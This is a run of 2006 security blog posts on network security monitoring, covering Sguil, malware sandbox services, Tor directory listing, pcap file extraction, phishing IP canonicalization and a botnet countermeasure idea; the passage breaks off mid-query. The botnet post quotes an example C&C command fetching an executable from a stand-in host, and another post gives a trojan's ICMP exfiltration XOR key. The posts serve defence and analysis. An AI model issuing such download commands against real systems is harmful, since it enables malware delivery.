Monday, December 18, 2006

Practicing What I Preach

Imagine for a moment that you worked for an employer who didn't do regular backups of their important data. As a security pro, the idea of regular backups is a central part of a good information protection strategy. If you're like me, you'd probably never agree that a lack of backups was a good long-term strategy for a business. That's just obvious.

Now stop imagining, and ask yourself whether or not you're following your own advice: are you backing up your personal data just as dilligently as protect your employer's?

I asked myself that same question last week, and the answer was, "no." I'm sure most of my readers are in the same boat, so consider this my Christmas present to you: a recommendation for a cheap, easy way to backup your personal data. (Sorry, it's Windows only, since that's most of what I run at home.)

It turns out that there are a lot of players in this area, many of which are targeted to the individual home user as well as to the small business. This is a pretty good roundup of several services. After doing a bit of reading, I decided to give one of them a try.

I chose Mozy, partly for it's price ($4.95/month for unlimited storage), partly for it's ease of use (set it and forget it), but mainly because it is the only one I saw that would allow me to both encrypt my backups and to set my own encryption key that is not stored by the company itself. The key is only available on my own PC, and as their warning dialog says, I'm "hosed" if I ever forget it. Still, it means that it's very unlikely that anyone but myself will ever be able to recover my files from the company's backup servers.

My initial experiences so far have been quite positive. Setup was dead simple, and although it's going to take quite a while to upload that first massive 52GB bolus, block-level incremental backups should help keep the volume down after that. I've tried some sample restores from the Web, and they've worked out well. For an additional fee, Mozy will even FedEx me a set of restore DVDs if I need to do a full recovery and don't want to wait for a giant download. About the only thing I don't like is that Mozy won't back up the simple NAS box I just bought, but I guess I can live with that.

New Year's Day is fast approaching, and setting up a good personal backup system would make a great resolution. You can try many of these systems for free (including Mozy) and choose which you like best. Then you can party all night, secure in the knowledge that all those boozy, embarrassing digital photos from the office party will be safe from "accidental" deletion.

PS. If you do decide to try Mozy, you'll get 2GB of storage for free. For an extra bonus, you can click through this link and get an extra 256MB. I've already paid for the full Mozy subscription, so I'm not getting any referral bonus, but I thought I'd post it anyway. Who couldn't use an extra 256MB of space?

Update 2007-01-02 08:43: Just for your reference, it took me about 12 days to complete the first full backup. It actually came out to about 62GB, as I added some more files to be backed up even before the initial set finished. Also, I also installed Mozy on my wife's computer, so I was doing two backups over a single connection for about 5 days.

All in all, everything has worked well so far. The biggest problem I've had was that the servers tend to disconnect the backup session during large (multi-gigabyte) transfers. This isn't a serious problem, because the clients will simply restart the backup again in a little while, but I'm sure it slowed things down a lot. I don't see this much now that I've completed my initial backup, though. Things seem to be going quite smoothly, and I'm still very pleased with the service.

Thursday, December 14, 2006

Sguil vs. BASE

This afternoon, someone asked me how I would categorize the differences between Sguil and BASE. I started with the standard response: "BASE is an alert browser, but Sguil encourages a more structured approach."

By the end of my reply, though, I found myself thinking about how to express this in a different way, something that emphasized the functionality of the two systems.

Here's what I came up with, excerpted from my own private email reply:

You can think of the process of intrusion analysis as formulating and
then trying to answer a series of questions. For example, one series
might be:


  1. Was this an actual attack?
  2. If so, was the attack successful?
  3. What other systems may also have been attacked?
  4. What activities did the intruder try to carry out?
  5. What other resources were they able to gain access to?
  6. How should we contain, eradicate and recover from the intrusion?

In this sequence, BASE does a great job of answering question #1. It may also have certain information about #3, but it probably wouldn't supply enough information to give good answers to questions #2, #4 or #5. By correlating the additional information sources, Sguil is often able to come up with very good answers to each of the first five questions. Of course, the more information you have at your disposal, the easier it will be to answer the most important question, #6.


Of course, I'd be very interested to hear from any BASE users who would like to either confirm or dispute my analysis. If that's you, leave a comment!

Monday, October 23, 2006

Comparing Automated Malware Analysis Services

Wow! It's been nearly two months since I posted anything here, for which I apologize. I've been busy as a bee. In fact, I think I caught the bees slacking off. I should be able to post a bit more regularly now, which ought to help me avoid losing my loyal reader.

This weekend, I happened to catch a computer that was infected with a fairly garden-variety IRC botnet, but this post really isn't about that. During the course of the investigation, I saw that the C&C server had instructed it's victim to download and run a certain file. As I frequently do, I used wget to download the same file so I could see what was in it.

Normally, my first stop for malware analysis is the UNIX strings command, but in this case, the binary was packed, so there was very little information available.

Now, I'm no programmer. I can do some simple C and some less simple Perl, but to be honest, I don't really have the sk1llz to do my own detailed malware analysis. Fortunately, this isn't much of a problem, because I rely on three excellent websites which can do this for me automatically.

I'm speaking, of course, about the Norman Sandbox, the CWSandbox and Virustotal. Each of these services offers a web-based interface for you to submit malware samples for automated analysis, usually returning the results within two or three minutes. Conceptually, they're all very similar, but they each have a different focus, so I thought a brief comparison might be in order.

Let's start with Virustotal, as it's much simpler than the others. Virustotal simply takes your sample and runs it against a variety of antivirus programs (I counted 26 this morning). The list includes most of the industry heavyweights, with the exception of Symantec. The end result is that you have a nice report that shows what, if anything, was detected in your sample malware. In my experience, it is rare that more than a handful of products properly detect the newest malware I find, so it's very handy to have a service that just runs it through through so many products and summarizes the output. The final report is delivered right on the web site, so once you submit your sample, you get a results page immediately, and as the scans progress, it is updated with fresh results.

Where Virustotal simply tells you the name of the detected malware, both the Norman and CW sandboxes provide a much more detail about the internal workings of the suspect binary. Using a combination of simulation, API hooking and other techniques, they will actually run the binary in the sandbox environment and look to see what actions it takes.

The Norman analysis (sample) relies on the same sandbox engine they use in their commercial antivirus products, and apparently you can purchase your own copy of the same sandbox system that the free website uses. The report comes back as a text-based email, and typically includes a list of files or registry keys that are created, deleted or modified. It will also usually tell you if the malware automatically restarts at boot time or not. Other features, like URLs opened or processes spawned, are kind of hit-and-miss. Norman failed to detect any of the network communication in the sample I submitted this morning. Overall, the report is a little on the basic side, but it's good for a quick read-through to see if you should be worried.

By far the most informative of the three services is the CWSandbox. Based on work performed by Carsten Willems at the University of Mannheim, CWSandbox is optimized for analyzing binaries which contain botnet software. The report is far more detailed than the other two systems, and includes much better information about files, registry keys and processes used by the malware. In fact, in my test this morning, it was the only one of the three to extract the list of IPs and ports that the binary would attempt to connect to. Unfortunately, the report is in XML format only, which would be good if I were going to process it with a script of some sort, but it does make it a bit harder for the analyst to read directly. Still, since CWSandbox gives the most detail of three, the extra effort is probably worthwhile.

If I had to pick just "the best" of the three, it would be CWSandbox, because it consistently gives more detailed information about the suspect binaries I upload. Fortunatley, I don't have to pick just one, and I routinely use all three to give myself the broadest coverage, and thus the best chance of finding out what the code really does.

Update 2006-10-30 14:08: Anti-spyware company Sunbelt Software also has an automated analyzer, it turns out. They're using the CWSandbox engine, but it delivers the reports in HTML or text-based emails. The HTML reports use very little formatting, but they're a lot easier to read than the XML reports CWSandbox itself returns.

I tried the Sunbelt version against the same binary I used to test the others, and though I found the report to be more useful overall (because it was readable), it didn't seem to include quite as much information about the Internet hosts the binary would attempt to communicate with. Perhaps Sunbelt has an older version of the engine?

In any case, Sunbelt generates my new favorite reports, though I still recommend submitting samples to more than one engine, just to make sure you've got your bases covered.

Update 2007-09-24 13:55: Paperghost over at Vitalsecurity.org posted a link to a new service called ThreatExpert.com. TE is part online sandbox and part malware encyclopedia. Basically, you upload malware samples and you get a nice report. The reports are also available to other users, indexed by their standard malware names (if known).

There are tons of sample reports in the database, and they are by far the best looking and easiest to read of all the similar services. They seem to contain basically the same type of information you'll find in the competing services, such as registry keys modified, files created, processes forked, etc. I've also seen a few really nice extras, such as the inclusion of screen shots of any windows that the code creates. TE also tries to identify the probable country of origin for the file, though I really have no idea how they do this. Strings analysis of the language included in the embedded text, perhaps? Another big plus is that it's the only such service to provide an optional user account that allows you to quickly locate and review reports for any of the samples you submitted. I can see this being very useful.

You'll notice that I used the phrase "seem to" in the last paragraph. For some reason, both of the UPX-packed samples I submitted failed to run properly. I got a report, but the sandbox indicated that the file could not be analyzed. To be fair, both the Norman and the Sunbelt sandboxes choked on it as well, failing to report any malicious activity at all. While this did keep me from generating a good comparative report, I'd have to say that ThreatExpert seems like a promising addition to my list of "go to" services for automated malware analysis.

Thursday, August 31, 2006

Listing active Tor servers...

Want to know the list of active Tor servers at any given time? It turns out that this is fairly easy to do.

When a Tor client starts up, and from time-to-time during normal operation, it needs to refresh it's list of active servers. The Tor network maintains several "directory servers" which keep track of which nodes are willing to perform onion routing functions. Because the Tor client may not have yet started (it can't join the Tor network before it knows which Tor servers to use), anyone can fetch the directory from the public Internet using HTTP.

The basic idea is pretty simple. Just visit one of the directory servers with a URL like the following:


http://belegost.mit.edu/tor/

The belegost.mit.edu system is one of the five or so authoritative Tor directories on the Internet, so it should be fairly stable. The file it returns contains all the information that a Tor client needs to know about each of the servers, including IP addresses and port numbers. The Tor directory protocol document can help you interpret the details fairly easily.

Of course, if you just want to know the list of active servers for monitoring or blocking purposes, you can just run the following perl script, which will dump out the server names, IP addresses and onion routing ports for you.

#!/usr/bin/perl
#
# Fetch the list of known Tor servers (from an existing Tor server) and
# display some of the basic info for each router.

use LWP::Simple;

# Hostname of an existing Tor router. We use one of the directory authorities
# since that's pretty much what they're for.
$INITIAL_TOR_SERVER = "18.244.0.114"; # moria2 / belegost.mit.edu
$INITIAL_TOR_PORT = 80;

# Fetch the list of servers
$content = get("http://$INITIAL_TOR_SERVER:$INITIAL_TOR_PORT/tor/");
@lines = split /\n/,$content;

foreach $router (@lines) {
if($router =~ m/^router\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s*$/m) {
($name, $address, $or_port, $socks_port, $directory_port) =
($1, $2, $3, $4, $5, $6);
print "$name $address $or_port\n";
}
}


Update 2008-06-09 11:38: In the nearly two years since I wrote this original post, the Tor folks have updated their directory protocol, and this script no longer works. Please see my newer post for an update and some working code.

Tuesday, August 29, 2006

Network Security Monitoring Wiki Launched

In cooperation with the Sguil project, I've just launched a new wiki, dedicated to Sguil and all things NSM: NSMWiki.

If you're a Sguil user, an NSM/IDS analyst, or just interested in network security in general, you should find things of interest there. It's just a skeleton now, but the great thing about wikis is that you can help us flesh it out!

Friday, August 25, 2006

The Pwnion

Inspired in part by my earlier posting about The Hidden Dangers of Protocols, some of us on #snort-gui were playing with the idea of The Onion applied to security. Here are some of the headlines we came up with.

<Hanashi> "Area Man's Password Hacked After He Exchanges it for Chocolate Bar"
<Hanashi> "Commentary: I Totally Pwn!"
<Nigel_VRT> "Wireless: No Wires! What's up with that?"
<Nigel_VRT> "Undisclosed remote bug in software that some people use"
<Hanashi> "Study: Second graders way too amused by phrase 'IP'"
<helevius> "Jumbo Frames: Obese, or Just Big Boned?"
<Hanashi> "Covert Channel Discovered in IPv6: The Use of IPv6"
<Nigel_VRT> "If you don't use Microsoft Windows, you're an evil hacker. By Staff writer Will G. Ates"


What about you? Post your best funny headlines in the comments!

Wednesday, August 23, 2006

I love command-line perl

If you read my blog on a regular basis, you've probably figured out that my favorite tool for performing general analysis and data manipulation is perl. Preferably, perl from the command line:

% cat data.dat | perl -e '...some code...' | less

Daniel Wesemann, one of the handlers at the Internet Storm Center posted a neato article on decoding traffic to uncover hidden executable content. And guess, what it uses??

Daniel, I like your style!

Tuesday, August 22, 2006

Dear BoingBoing...

If you've ever checked out my blogroll, you might have noticed that I read BoingBoing on a regular basis. Most of their posts are pretty interesting, but they seem to have a chip on their collective shoulder when it comes to a certain Internet content filtering product. Their most recent post on the subject really got my attention.

In response, here is an open letter to the editors at BoingBoing.

Dear BoingBoing,

I'm right there with you when you cover issues of government-sponsored censorship. Censorship is contrary to the ideas of freedom and democracy. But it's not censorship when the administrator of a corporate or privately-owned network enforces a policy on how their network should be used. In most cases, that's just good security management. Please don't confuse the issues, because it weakens your position when you speak out about legitimate abuses.

WebSense isn't censoring you. WebSense doesn't censor anyone. All they do is categorize websites, and it's up to their individual customers to create and enforce filtering policies based on those categories. In this latest case, the site archive.org does in fact offer software downloads and is correctly categorized. And whether or not you agree with the idea, as a security pro, let me assure you that filtering such sites is a very reasonable thing to do for many organizations, especially those that have policies against installing arbitrary software.

Of course, as you're finding out, filtering technology isn't perfect. Sites are misclassified or simply not categorized at all. Filtering software can be bypassed, fooled or even brought down. That does not mean that it is worthless and evil, however. Every little bit helps, and the technology improves each day (albeit slowly).

Anyway, thanks for all your hard work on BoingBoing. I do enjoy reading most of what you write, but I hope you'll keep my points in mind next time you write a story about Internet content filters.

I answered my own question

A couple of weeks ago, I wrote about the FBI's call for help from the security community. My question then was, "How do we get in touch with the FBI to offer our help?"

It turns out not to be very difficult. The same day, I wrote the following email to my local FBI field office:

Good morning. I've been reading news articles for the past few days about FBI Cybercrime Unit Chief Daniel Larkin's speech at the Blackhat conference last week. In it, he called for assistance from the information security community. I admit that I'm not really sure exactly what sort of help is required, but I'd like to contact someone in your office in order to offer my assistance.

I've been doing IT and Cybersecurity for about 15 years, and my specialties include analyzing hacker techniques, security incident reponse and security monitoring/intrusion detection. I run my own security consulting company, which you can read about on my website (www.vorant.com).

I'd like you to know that if the need arises, I'm here to help.


To my surprise, I got an email from one of the Special Agents assigned to the cybercrime team at the local field office. We met this morning at the local coffee shop.

It turns out that the number one thing he needs is a network of people on the front line that can identify potentially-significant threats, ideally before they can become truly dangerous. New hacking techniques, novel scams and the like. As NSM/IDS people, we're likely to pick up on these sorts of things before they are otherwise widely-known, and this could provide law enforcement with a valuable heads-up.

Now, I'm not suggesting that you hand over your monitoring data to the FBI or any other agency at the slightest provocation. There are significant privacy and organizational policy concerns to be aware of. Unless you're actually reporting a crime, be careful about what you reveal. In most cases, however, there's no problem with sharing information about the technique or the possible impact of successful attack.

If you'd like to try hooking up with your local FBI field office, check out this list of field offices. Give it a try and let me know how it goes.

Friday, August 18, 2006

Tony Bradley: Reform Candidate for the ISC(2) Board

Those of you who hold the CISSP know that elections for the ISC(2) Board of Directors are coming up soon. Usually the existing Board members put forth a slate of candidates themselves, but there is a provision for an individual to be added to the ballot without the Board's approval. If the candidate can get the support of 1% of the membership on a petition, they're added to the ballot.

Today, I got the official notice that one member, Tony Bradley (CISSP-ISSAP), has elected to pursue this route. After reading his platform, I've decided to sign his petition. Here's an excerpt, which summarizes things nicely:

There are three primary components of my platform and vision for ISC2 should I be elected.

  • ISC2 should work to cooperate and coordinate with other security organizations and professionals to develop a set of generally accepted information security principles.
  • ISC2 should publicly vet the contents of the CBK in order to improve the information as well as expanding the acceptance and respect granted to those who show an understanding of the CBK through achieving the CISSP certification.
  • Election procedures should be modified to reduce the hegemony of the sitting Board of Directors and ensure a fair election process that allows the constituents to pursue election more freely.

I strongly support his first two points. We're plagued with "professionals" without proper training or knowledge and "solutions" that only solve vendor cash flow problems. Common Criteria is an attempt to solve the "solutions" problem, but so far there isn't a good solution for ensuring that we're hiring competent professionals. Certifications (like the CISSP) and accreditations may be an answer, but without an industry-wide agreement on their content, it's difficult to evaluate their effectiveness.

That's where the ISC(2)'s Common Body of Knowledge (CBK) comes in. It's probably the most extensive security knowledgebase available, but it's also proprietary, and that holds it back. Having just taken the CISSP test this year, my experience with the CBK is fresh in my mind. There are parts of it that sorely need the kind of open review process Bradley proposes.

If you're an ISC(2) member, I encourage you to read Mr. Bradley's comments.

Wednesday, August 16, 2006

Dumbest. Seminar. Ever.

I got the following today, from a very reputable security vendor. I'm not going to name them, because I think they're otherwise pretty good, but this is really just pathetic:

The Hidden Dangers of Protocols

Protocols are the sets of rules governing the communications of network applications, such as instant messaging, peer-to-peer file sharing, and streaming media. But, protocols may allow these communications to transmit confidential information, spyware, keyloggers, worms, viruses, and other security threats into and out of your organization. Protocols may also allow users to access inappropriate applications. Plus, they may be consuming valuable network bandwidth and draining user productivity in the process!

Protocols are dangerous? I've got news for this writer: protocols put the "work" in "network". Without TCP/IP, odds are you don't have a network, and that's not counting the myriad other protocols above and below the IP level.

Clearly, the vendor (as a whole) understands the concept of protocols perfectly well. So I conclude that either they've hired an incompetent writer or editor in the marketing department, or they're taking the chance to do a little FUD-mongering. I'll be charitable and guess it's the former.

Seriously, this is the dumbest thing I've seen from a security company in quite a long time.

Tuesday, August 08, 2006

Decrypting XORed ICMP Packets

This morning, WebSense issued an alert about a new trojan that uses ICMP packets to send banking data back to the controller's collection site. As far as I can tell, it registers as as browser helper object (BHO) with IE, then waits for you to go to any of a predefined list of banking site login pages. When you submit your authentication data, it sends a copy back to the attacker via ICMP.

This is new in a mass-market trojan, but the technique has been known for some time (google loki ICMP to see some early work on ICMP tunnels). The interesting part is that WebSense posted a sample packet in both encrypted and decrypted form (minus a few bytes that contained personally identifiable information about the victim).

Just for fun, I decided to find the decryption key. For your reference, here is the key used to encrypt the WebSense sample packet:


60 31 75 70 73 a0 a9 91 d7 c4 09 7b 78 e9 b3 8e
89 8b 5f 6d 6f 6a 2b 53 48 54 5c b9 2c 36 63 04
d3 1a 58 02 fa e7 d9 17 3f da db 41 bb f7 b3 83
86 83 4e 20 7f 6d 79 07 8c 10 56 01 f6 23 d1 1a
e0 5d XX XX XX bc 3e 13 1b 0f 01 4d bd 9f b8 92
9e 8b 7e 22 XX XX XX XX XX XX XX b7 ca f4 eb f0
c7 e2 08 f5 05 e5 a4 85 87 82 f6 6e 54 3f XX XX
XX XX XX f8 e6 e1 8b 90 83 8b 82 98 6d 73 60 47
92 90 9c 7f 68 6a 7c 42 52 53 42 2f 34 37 37 04
1d 72 68 ab 93 98 a5 97 97 94 98 fc e2 e9 e4 d3
2a c6 da 34 54 40 5c 1c c2 04 06 67 15 a4 a0 98
9a 1c bd 5c 71 6e b2 a2 e2 1c 49 3f 2c d7 f5 0e
1f 5f c1 ea fc ed 10 24 cc d7 dc fe 90 ab a0 9b
53 75 89 6a 2c 45 74 5f 5a 96 a5 3f 28 60 2c 00
17 36 d1 f1 e9 eb 0b c1 85 95 9d e5 f7 12 34 0c
59 56 5a a0 b3 65 64 55 56 56 03 78 0a 6d 1a fc
f0 d5 9a 41 57 4b 52 5a 36 4f 3d 66 77 54 7e 6a
90 cf b8 41 3e 34 ff e5 f3 cb de b2 eb f3 e9 cf
c2 0d 1c ee ab cb e4 de 8c 65 63 a1 bd 77 69 69
8e 92 86 6f 82 60 26 54 4c 4a 53 da 56 4a 47 6f
4f d2 a4 25 00 00

The bold XX bytes are the ones for which the plaintext was obscured, so I couldn't easily recover those portions of the key with just the single sample packet.

Bonus points to the first reader who posts code to verify this. It's pretty simple, but a fun etude for security folks. Extra bonus points if you can confirm that all packets use the same key and/or find missing key bytes that weren't available in the sample packet. What are you waiting for?

Monday, August 07, 2006

"FBI needs hackers" -- Ok, now what?

Breaking non-news! Vnunet reports that the FBI needs hackers to help it understand and combat cybercrime. I've heard this a million times before, and not just from Blackhat last week.

So my question is what, specifically, should we be doing? I'm sure I'm not the only security pro willing to lend a hand, but how should we each go about doing it? There are plenty of us who have solid technical chops, the ability to communicate with non-technical audiences and the strong desire to use our powers for good. Has anyone successfully stepped up, and can you share your thoughts on how to get started?

Thursday, August 03, 2006

Crazy Botnet Idea

I read with interest Gadi Evron's recent post, mitigating botnet C&Cs has become useless (while you're at it, read Richard Bejtlich's response, too). Gadi Evron has probably forgotten, relearned and forgotten again more things about botnets than I will ever know, so when he speaks on the subject, I pay attention.

As with most security problems, the basic issue here is that competition drives innovation. Like biological evolution, the digitial evolutionary imperative mandates that as we improve our defensive techniques, the Bad Guys also improve their offense. With the transition from amateur malware writers to professional bad actors, the pace of this evolution has already and will continue to increase dramatically.

So what can we do? First, let me make the following assertion:

Botnets are harmful both to local networks and users, and to the Internet community as a whole.

I don't think anyone would disagree with that statement. Let's follow it up with another:

Doing nothing to protect ourselves is not an option.

Now, if we accept Gadi's premise that cutting off C&C channels is harmful in the long run, where does that leave us?

The root of that premise is that long-term harm occurs because our current methods have too high an impact on botnets. By shutting off the C&C servers, we take a discernable action, forcing the botnet owners to respond or lose access to their net.

Let's think about this for a second. If we've so far fought the problem by shutting down C&C servers, it stands to reason that most of the botnet countermeasures have also evolved to deal specifically with that sort of threat. If we're able to change our response, we may gain (temporary) advantage.

So here's my crazy idea. The HoneyNet Project already has tools that dynamically modify network traffic in order to prevent outgoing attacks from their honeypots from affecting other Internet hosts. Let's repurpose this technology to act in reverse; let's use it to protect our hosts from fully participating in identified botnet C&C channels.

How would this work? I haven't worked all the details out, but I'm thinking of something like the following:

  1. The attacker sends a command to a host through the C&C channel (e.g., .download http://my.bad.host/file.exe)
  2. An anti-botnet gateway at the user's site intercepts this, and transparently modifies the packet to say something slightly different (e.g., .d0wnl04d http://my.bad.host/file.exe)
  3. The botnet node on the compromised PC doesn't recognize this as a command, so takes no action
  4. The attacker never realizes that he's lost control of the botnet node, because it's still participating in the C&C communication channel. Even though he's not getting any responses to some of his dangerous commands, perhaps less dangerous commands are working well, disguising the fact that we're interfering with his attacks.

You're probably saying to yourself, "Hey, this requires a lot of work to maintain." If so, you'd be right. We'd have to track the botnet C&C channels, analyze their command structures and somehow get updates out to the protected sites. I think of this as sort of an extension to current spyware/malware discovery processes, and we'd probably need some serious commercial support if this idea were to ever be implemented.

The point is, we've tried attacking the problem both from the C&C side (shutting down servers) and from the client side (patch management & user education). Now let's try something that more fully leverages our control over our own network infrastructure, too.

I told you it was a crazy idea.

Friday, July 21, 2006

Extracting gzipped or Unix script files from pcap data

During an incident response, it's often handy to be able to examine the actual attack traffic, and if you're using Sguil, you probably have it handy. One common situation is that an intruder has transferred files to or from your network, and you'd really like to see what's in them.

There's a great tool for extracting arbitrary files from pcap dumps, tcpxtract. Similar to the way hard drive forensic tools look through bytes on the disk to find the "magic headers" at the beginning of various types of files, tcpxtract combs through pcaps looking for file types it knows, regardless of the transport protocol used to ship them over the network. When it finds them, it writes them out to individual files for manual analysis.

Tcpxtract is a great tool for NSM practicioners, and should be in everyone's standard kit. There are a few common types of files that it doesn't support, but you can easily fix this by simply editing the tcpxtract.conf file to add support for new types if you know their magic numbers.

My friend geek00L has already blogged about adding Windows PE executable support. Now I'm here to tell you how to add support for gzipped files and Unix script files like "#!/some/file" ("#!/bin/sh" or "#!/usr/bin/perl" for example).

Just add the following two lines to the end of tcpxtract.conf:


gzip(1000000, \x1f\x8b\x08);
script(1000000, \x23\x21\x2f);

A little anti-climactic after all that buildup, wasn't it? I've had some advice that the script detection is likely to throw lots of false positives in an SSL session, so maybe you should keep it commented out until you know there are script files in the session that you need to find.

Thursday, July 13, 2006

Canonicalizing funky IP addresses

I've been playing around with some phishing data recently, to see if I can correlate known phishing attempts with my outgoing network sessions in order to alert me when my users fall victim. I don't have any results to report for this yet, but I did have to do some research into canonicalizing IP addresses.

Most people don't realize this, but there are a few different IP address formats. We're using to seeing the dotted decimal quad form (e.g. "192.168.1.1") but there are others, and the phishers are using them. Thus, it behooves us to know how to work with them.

I was unable to find a comprehensive list of available formats online for some reason (if you know of one, please leave a comment!) so I examined my corpus of phishing URLs and found the following examples:


  1. 192.168.1.1
  2. 1127353292
  3. 0x43320bcc
  4. 192.0x43.9.3 (i.e., mixed decimal and hex quads)


Of course, phishers are also using normal hostnames as well, giving us at least 5 different types of possible inputs to deal with. Most of our tools use the decimal dotted quad format, so we need to normalize these formats into something useful.

Here's a Perl function that should do this for you. If you pass it any of the above formats (including the hostname), it will normalize the input and return a decimal dotted quad in string form, suitable for your favorite security tool. If it can't be converted (maybe it's a hostname that no longer resolves) the function returns undef instead.

I've wrapped this in a simple command-line tool and also incorporated it into other Perl scripts. I'm sure you'll find other uses for it as well. And hey, if you come across any other legal address formats, please let me know.


use Socket;

# Take any valid IP address or hostname and return the normalized IP address.
# Recognizes the following formats:
# some.host.com
# 192.168.0.1
# 0x43320bcc
# 1127353292
# 192.0x1c.0x10.9 (ie, mixed decimal and hex quads)
# The function returns the string value of the IP address if successful, or
# undef if not.
#
# Warnings:
# 1) This will return only a single address, so if the hostname resolves
# to more than one address, you won't get them all.
# 2) It will generate a DNS query when looking up hostnames
sub normalize_funky_addrs {
my($host) = @_;
my($addr);

# If this is a hex address (e.g., "0x01234FAc") then first convert it to
# decimal form
if($host =~ m/^0x[a-fA-F0-9]+$/i) {
$host = hex($host);
}

# If the entire address wasn't hex, individual octets might be. If so,
# find them and convert them. Split the address into octets, check and
# covert hex in each octect as necessary, then paste them all back together
# into one string and continue processing. Yes, I could just return here,
# but I'd rather have only one function exit point.
if($host =~ m/^([^.]+)\.([^.]+)\.([^.]+)\.([^.]+)$/) {
($octet1, $octet2, $octet3, $octet4) = ($1, $2, $3, $4);
$octet1 = hex($octet1) if ($octet1 =~ m/0x/i);
$octet2 = hex($octet2) if ($octet2 =~ m/0x/i);
$octet3 = hex($octet3) if ($octet3 =~ m/0x/i);
$octet4 = hex($octet4) if ($octet4 =~ m/0x/i);
$host = "$octet1.$octet2.$octet3.$octet4";
}

# Now we've either got a hostname, a normal IP address or an integer-form
# IP address. We can work with any of those.
$addr = gethostbyname($host);
if($addr) {
return inet_ntoa($addr);
} else {
return undef;
}
}

Thursday, June 22, 2006

Extracting email attachements from pcap files

From time to time, I need to examine email attachements that may have been delivered to my users, usually to see exactly what type of malware was included. Now, I could call them up and ask them if they got the message, but there are several reasons I don't like to do that. For example, I hate playing telephone tag, and I don't really want to encourage them to open the message for any reason.

Since I use Sguil, I have another option. I can extract the attachement from the network data directly. Here's how.


  1. Capture the session of interest as a pcap file. If you're also using Sguil, you can probably just do a SANCP search to find the network session that contained the message as it was delivered to your SMTP server. Open it up in Ethereal, which causes the Sguil client to copy the pcap file to your analysis workstation. Close Ethereal now, because you won't be using it for this.
  2. Once you have the pcap file, use the tcpflow tool to extract an ASCII version of the conversation. This will create two files, one for the server side of the session, and one for the client side. Here's an example, where xxx.xxx.xxx.xxx is the sending host, and zzz.zzz.zzz.zzz is your mail server:

    % tcpflow -r xxx.xxx.xxx.xxx_yyyy_zzz.zzz.zzz.zzz_25-6.raw
    % ls
    xxx.xxx.xxx.xxx_yyyy_zzz.zzz.zzz.zzz_25-6.raw
    xxx.xxx.xxx.xxx.yyyy-zzz.zzz.zzz.zzz.00025
    zzz.zzz.zzz.zzz.0025-xxx.xxx.xxx.xxx.yyyy

    The file you need to concern yourself with now is the one that ends in .00025. That's the one that contains the email message sent by the client.
  3. Edit the *.00025 file in your favorite text editor. As it is now, it's a complete record of all the SMTP protocol events, and what you really want is just the data. The easiest thing is just to delete everything up to (but not including) the first line that starts with "Received:".
  4. Use the following perl command to read the mail file in via stdin and dump out the decoded MIME message. The script uses the MIME::Parser module (available from CPAN) to handle MIME decoding.

    % perl -e 'use MIME::Parser; \
    $parser = new MIME::Parser; \
    $parser->output_under("/var/tmp"); \
    $entity = $parser->parse(\*STDIN); \
    $entity->dump_skeleton;' < *25


    Content-type: multipart/mixed
    Effective-type: multipart/mixed
    Body-file: NONE
    Subject: Message could not be delivered
    Num-parts: 2
    --
    Content-type: text/plain
    Effective-type: text/plain
    Body-file: /var/tmp/msg-1150990039-2841-0/msg-2841-1.txt
    --
    Content-type: application/octet-stream
    Effective-type: application/octet-stream
    Body-file: /var/tmp/msg-1150990039-2841-0/letter.zip
    Recommended-filename: letter.zip
    --

    As you can see, this command creates a directory /var/tmp/msg-XXXXXXX-XXXX-0/ which contains files for each piece of the MIME multipart message, including the attachement (in this case, /var/tmp/msg-1150990039-2841-0/letter.zip).


Now that you've got the attachement, you can use your favorite reverse engineering tools on it to figure out exactly what you've got on your hands.

Monday, June 19, 2006

Laptop encryption? I have a better idea.

I just read an AP article from last week, entitled Encryption can save data in laptop lapses. We hear about this problem in the news all the time now: someone loses a laptop with personally identifiable information about thousands of {customers|taxpayers|veterans|others}.

This is a real problem, make no mistake, but articles like this one are starting to piss me off. Instead of talking about encryption, let me propose a much more revolutionary idea: don't put the freakin' data on the laptop in the first place!

Laptops are designed to be mobile, and are easily lost, stolen or broken. Good encryption practices are rare (hint: it's not just a matter of software, but also of implementation, policy and user acceptance). Instead of worrying about who's laptop is going to be stolen next, let's try to address the real issue: does that data really need to be stored on the laptop in the first place?

If mobile users need access to data in the field, make them VPN back to the corporate network and work on it there. And don't tell me things like, "But we need to work on the plane" because you don't. You may want to work at 26,000 feet (it's better than watching Firewall on the tiny screen), but my privacy rights outweigh your productivity crisis anytime.

Let me end this rant by saying that if your company insists on placing your customers' personal information on laptops or other mobile devices, encrypted or not, I hope they hammer you in court.

Update 2006-06-09: Finally, some mainstream coverage for this apparently radical idea! In a story entitled Why Do Laptops Schlep Such Data?, the unnamed AP author raises the question about whether carrying such data around on mobile devices is appropriate. Short answer: "No, but some people will inevitably find a way to do it anyway." No doubt this is true, and that's why routine encryption of mobile data remains important. Just don't be confused about the proper use of mobile encryption: It's not the first line of defense, it's the last. It ideally only comes into play once someone has violated corporate policy by copying data onto the device.

Unfortunately, the article does miss (badly!) on an important point. The second-to-last paragraph describes software that "shreds" data on the hard drive if the laptop is stolen. The idea behind this type of so-called protection is absurd. The laptop's OS and security software has to be running in order for this to be effective, but any competent computer thief can swap out a hard drive and copy the data with only a few moments' work.

Thursday, June 15, 2006

Tracking your most active network protocols with Sguil

All you Sguil users out there might find this interesting. I wanted to figure out a way to track the top most active protocols flowing over my perimeter, where "active" in this case means "most bytes transferred either in or out of my network". This is actually a fairly simple database query, but I had a special requirement.

You see, I wanted to know not only the total number of bytes transferred, but I wanted to see it broken down by whether the traffic was entering my network or leaving my network. SANCP (Sguil's session collector) tracks bytes by source and destination, but that's not good enough. The source of one connection could be an Internet host, while the source of another connection could be a system on my own LAN. Just because SANCP records how many bytes the source host sent doesn't mean it knows whether they were entering or leaving my LAN.

Here's a SQL query that really can tell the difference:


select dst_port,
sum(to_mynet) as bytes_to_mynet,
sum(from_mynet) as bytes_from_mynet,
sum(to_mynet + from_mynet) as total_bytes
from
(
select dst_port,
src_bytes as from_mynet,
dst_bytes as to_mynet
from sancp where
(start_time between DATE_SUB(CURDATE(), INTERVAL 1 HOUR)
and CURDATE())
and (src_ip between INET_ATON("192.168.0.0") and
INET_ATON("192.168.255.255")) and
not (dst_ip between INET_ATON("192.168.0.0") and
INET_ATON("192.168.255.255"))
UNION ALL
select dst_port,
dst_bytes as from_mynet,
src_bytes as to_mynet
from sancp where
(start_time between DATE_SUB(CURDATE(), INTERVAL 1 HOUR)
and CURDATE())
and not (src_ip between INET_ATON("192.168.0.0") and
INET_ATON("192.168.255.255")) and
(dst_ip between INET_ATON("192.168.0.0") and
